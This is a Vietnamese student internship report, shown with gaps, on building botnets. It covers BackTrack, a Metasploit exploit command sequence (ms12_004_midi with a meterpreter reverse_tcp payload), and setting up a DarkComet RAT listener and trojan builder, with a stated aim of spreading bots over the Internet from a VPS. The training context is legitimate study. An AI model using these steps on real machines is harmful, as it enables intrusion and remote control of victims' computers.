TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ
ATHENA

BÁO CÁO THỰC TẬP
ĐỀ TÀI:
Nghiên cứu và triển khai mạng lưới
zombie , botnet trên hệ thống mạng GVHD : Võ Đỗ Thắng
SVTT: Hồ Quốc Nghị
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
2
Trang
LỜI CẢM ƠN
  
Trước hết em xin chân thành cảm ơn tất cả các thầy cô tại Trung Tâm Đào
Tạo Athena đã tận tình hướng dẫn em trong quá trình thực tập tại Trung Tâm Đào
Tạo Athena .Bên cạnh đó nhờ có sự giúp đỡ của thầy cô và các bạn cùng

khóa, đến

TP.HCM, ngày …. tháng …. năm 2014
Giáo viên hướng dẫn Võ Đỗ Thắng Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
4
Trang
MỤC LỤC

I.

LỜI MỞ ĐẦU 6

1.

Sự cần thiết của đề tài 6

2.

Mục tiêu nghiên cứu 6

3.

Phương pháp nghiên cứu 6

II.



a.

Các khóa học dài hạn 10

b.

Các khóa học ngắn hạn 10

c.

Các sản phẩm khác 11

d.

Cơ sở hạ tầng 11

e.

Các dịch vụ hỗ trợ 11

6.

Khách hàng của Athena 11

7.

Đối tác của Athena 12

8.


1.

Triển khai trong môi trường LAN 21

2.

Thử nghiệm xâm nhập bằng Metasploit 22

V.

XÂY DỰNG BONET BẰNG DARKCOMET 24

3.

Giới thiệu DarkComet 24

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
5
Trang
4.

Cài đặt DarkComet 24

VI.

HƯỚNG PHÁT TRIỂN 31

VII.


2. Mục tiêu nghiên cứu
Đề tài nghiên cứu trên hai môi trường:
Giai đoạn 1:
Trong môi trường mạng LAN, tìm ra được các lỗ hổng bảo mật trên các máy trong
mạng, thử xâm nhập trên các máy.
Giai đoạn 2:
Trong môi trường Internet, dùng DarkComet để thử tạo, phát tán và điểu khiển
mạng lưới botnet thông qua mạng Internet.
3. Phương pháp nghiên cứu
Giai đoạn 1:
Sử dụng ảo hóa VMware để mô phỏng môi trường mạng LAN. Cài đặt Backtrack
trên một máy ảo VMware. Sau đó thực hiện thâm nhập từ máy Backtrack tới một
mục tiêu.
Giai đoạn 2:
Cài đặt và tạo bot bằng DarkComet trên VPS (Virtual Private Server) và phát tán
trên mạng. Sau đó thực hiện xâm nhập, kiểm soát từ xa thông qua địa chỉ IP public
của VPS.

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
7
Trang
II. GIỚI THIỆU TỔNG QUAN VỀ TRUNG TÂM ĐÀO TẠO ATHENA
1. Sơ lược trung tâm
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền
thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương
hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo
giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh
cấp ngày 04 tháng 11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED.

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
8
Trang
b. Cơ sở tại HCM
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam
c. Thông tin liên hệ
Điện thoại: ( 84-8 ) 3824 4041
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 23 00 99
Website: www.Athena.Edu.Vn
3. Quá trình hình thành và phát triển
Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh
vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền
công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao
và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ
thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ
thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá
nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ
công nghệ thông tin cho đất nước và xã hội.

Các thành viên sáng lập trung tâm gồm:
- Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena,
hiện tại là giám đốc dự án của công ty Siemen Telecom.
- Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty
EIS, Phó Tổng công ty FPT.
- Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách
nhiệm công nghệ thông tin của Ngân hàng.
- Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an
ninh mạng Athena.

khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học
hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm
giám đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa
chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với
quyết tâm mạnh mẽ và một tinh thần thép đã giúp ông Thắng vượt qua nhiều khó
khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng.
Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung
tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt
động của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào
tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty,
tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân
lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào
tiến trình tin học hóa nước nhà.
4. Cơ cấu tổ chức
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
10
Trang

5. Các khóa học của trung tâm Athena
a. Các khóa học dài hạn
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician.
- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager
Administrator

- Thiết bị đầy đủ và hiện đại.
- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
- Phòng máy rộng rãi, thoáng mát.
e.
Các dịch vụ hỗ trợ

- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.
- Giới thiệu việc làm cho mọi học viên.
- Thực tập có lương cho học viên khá giỏi.
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không
giới hạn thời gian.
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng.
- Hỗ trợ thi Chứng chỉ Quốc tế.
6. Khách hàng của Athena
Mọi đối tượng chuyên hoặc không chuyên về CNTT.
Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán bộ
công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
12
Trang
7. Đối tác của Athena
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự
CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho các
đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…
8. Đội ngũ giảng viên của trung tâm đào tạo Athena
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học
hàng đầu trong nước Tất cả giảng viên ATHENA đều phải có các chứng chỉ

Network Management Protocol (SNMP).
Web application analysis: loại này chứa các công cụ có thể được sử dụng trong
theo dõi, giám sát các ứng dụng web.
Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần
số vô tuyến (RFID).
Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ
hổng tìm thấy trong các máy tính mục tiêu.
Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy
tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc
quyền của chúng ta cho các đặc quyền cao nhất.
Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy
trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được
những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy
trì quyền truy cập.
Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ
trong thể loại này.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
14
Trang
Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể
được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc
các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp
trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn
khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin
trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ
rối chương trình một hoặc tháo rời một tập tin thực thi.
3. Cài đặt
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack-
linux.org/downloads/, có bản cho Vmware và file ISO.


Gõ startx để vào chế độ đồ họa trong BackTrack

Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
17
Trang

Chọn ngôn ngữ, chọn Tiếp để tiếp tục

Chọn múi giờ, chọn Tiếp để tiếp tục
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
18
Trang

Chọn ngôn ngữ bàn phím, chọn Tiếp để tiếp tục

Chọn phân vùng để cài, chọn Tiếp để tiếp tục
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
19
Trang

Nhấn Cài đặt để bắt đầu cài

Quá trình cài đã bắt đầu.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
20
Trang

Sau khi hoàn tất, chỉ việc khởi động lại là xong.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
22
Trang
Mô hình mạng LAN được mô phỏng:
2. Thử nghiệm xâm nhập bằng Metasploit
Trong Backtrack, chúng ta sử dụng công cụ Metasploit để thực hiện xâm nhập.
Công cụ này có database rất lớn, về các lỗi tồn tại trên các hệ điều hành và cách
tấn công.
Để khởi động giao diện Console của Metasploit, trong Terminal, gõ msfconsole.
Giao diện chương trình:

Khi dấu nhắc trở thành msf> , chúng ta có thể sử dụng chương trình.
Để sử dụng một module nào đó, chúng ta sử dụng cú pháp:
use <Đường dẫn đến module>
VD: khai thác lỗi ms12_004
use exploit/windows/browser/ms12_004_midi -> Enter
Các thiết lập:
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.0.126
set LHOST 192.168.0.126
exploit
Switch

chuyển thư mục làm việc hiện hành về darkcomet5.3.1RAT. Dùng lệnh wine
darkcomet để khởi động DarkComet:
wine darkcomet

Giao diện quản lí của DarkComet:

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
25
Trang
Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to
new port(+Listen) Điền cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận
Ta có thể thêm cổng lắng nghe khác nếu muốn.
Tạo trojan:
Trojan có thể được tạo từ bất kì máy windows nào. Các bước tạo trojan:
Download DarkComet
Giải nén file DarkComet531RAT.zip vào thư mục DarkComet.
Vào thư mục DarkComet, chạy file DarkComet.exe
Vào DarkComet -> Server module:
Chọn Minimalist nếu muốn dùng các tùy chọn mặc định
Chọn Full Editor nếu muốn tùy chỉnh tất cả tùy chọn.